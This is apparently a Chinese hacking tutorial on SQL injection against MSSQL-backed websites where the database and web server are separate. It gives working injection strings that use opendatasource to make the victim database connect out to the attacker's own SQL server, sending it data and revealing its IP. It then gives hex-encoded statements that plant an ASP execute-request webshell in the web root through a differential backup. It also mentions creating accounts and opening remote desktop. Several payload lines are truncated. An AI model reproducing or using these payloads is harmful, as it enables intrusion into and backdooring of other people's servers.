現在注入橫飛！工具一大堆，過去手工注入的時代已經不復存在！代之的是NBSI HDSI 啊D注入工具..等等.也是廣大菜鳥的最愛了.即使什么也不會.什么也不懂.只需要點幾下鼠標.存在注入的網站密碼就出來了.接下來就是掃掃后臺.傳傳馬.就完了.就這樣簡單.碰到SA權限的話就.直接建立號開3389或者上傳WEBSHELL.是內網就映射.是DB_OWNER權限的話呢就考慮用備份差異.但是WEB和庫不在同一臺器該怎么搞呢？其實也不一定是搞不定.除了往注冊表啟動鍵值寫DOS命令，讓目標器下會開機執行，不過也是有局限性的.該用戶必須授權于Master這個庫.才可調用儲存過程.很少有管理員會這樣做.所以希望很渺小.如果我們遇到這種情況的話該如何搞呢？看圖1

DB權限.列下目錄看看是否跟WEB在一塊.要是在一塊可考慮備份差異.不過很可惜.找來找去都沒有找到WEB目錄.如圖2

這是利用MSSQL的XP_dirtree儲存過程讀取路徑.然后寫入臨時表的結果.以前的NBSI沒這功能.小菜門只好掃掃SA啊。弄弄后臺之類的.后來NBSI增加了treelist的功能.可列出目錄，更為方便查看目錄結構.軟件信息等等.后來臭要飯的開發了Getwebshell才使這功能畢生光芒,把馬插到庫里，然后把庫備份為ASP文件.行是可行.但是庫要是過大的話.幾十M的WEBSHELL你說能用嗎？Xiaolu的備份差異還算不錯了.減少文件大小.進行差異備份.不過還是回到原來一點.和WEB不在一塊......

其實.即使庫和WEB不在一塊還是有機會搞的.并不是說一點機會沒.一般器裝好系統什么的.都會裝個IIS吧？列他C盤.看看有沒有Inetpub這個目錄.就知道他有沒有裝IIS了.但是.不知道他IP也？怎么辦呢？可以這樣來，PING一下WEB器.掃他這一C段的1433端口.看看哪臺開了.不過這方法也不好.現在很多主機都啟用了防火墻.1433端口就算開了你也掃不著.這該怎么辦呢？可以利用opendatasource宏讓對方的SQL與自己的庫建立連接.既然能建立連接.就可以得到庫器的IP地址了.我們來試試看.有幾個前提得說一下.第一.你機器必須要有公網IP.而且開放的1433端口要保證能被外網訪問到.好.條件滿足.就開始做吧！

我現在搞的這站.100%和WEB不在一塊.但是從C盤看到了Inetpub文件夾.說明這庫器安裝了IIS.但是得不到他IP呀.怎么搞哦.簡單.就用上面所說的方法搞一下.先在本機建個庫先.打開查詢分析器輸入
create database hack520 CREATE TABLE zhu(name nvarchar(256) null);CREATE TABLE J8(id int NULL,name nvarchar(256) null); 點執行.如圖4

建立了一個hack520的庫名.和zhu  J8兩個表.zhu里面有name這一個字段.J8也放了兩字段名.一個是id一個是name.好了.現在就可以開始建立連接了~~~~~~~先看一下這條SQL語句insert into opendatasource('sqloledb','server=你的IP;uid=SQL用戶;pwd=SQL密碼;database=建立的庫名') .庫名.表名 '執行的語句'  恩現在開始吧...

hack520').hack520.dbo.zhu%20select%20name%20from%20master.dbo.sysdatabases--

在IE上執行咯.呵呵這個時候對方就會連接到我機器的SQL器.不信？netstat -an看一下~圖5

哈哈已經連過來了.現在庫器IP知道了.而且庫器又開了80.現在干什么呢？

bak一個webshell上去吧.已知WEB目錄C:\Inetpub\wwwroot.好.開始
tg800;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x737339323238 backup database @a to -- 備份當前庫

table [hack520];create table [dbo].[hack520] ([cmd] [image])--  建表

into hack520(cmd) values(0x3C2565786563757465207265717565737428226C2229253E)--  插入藍屏木馬

@a sysname,@s varchar(4000) select @a=db_name(),@s=0x433A5C496E65747075625C777777726F6F745C7A68752E617370 

backup database @a to WITH DIFFERENTIAL,FORMAT-- 再次以差異備份得到WEBSHELL

接下來就是用藍屏木馬客戶端連接咯.這個就簡單了.我這里就不多說了.雖然沒有拿到WEB器的SHELL.但是至少也不是空手而歸.拿到了庫器的SHELL.就到這里.88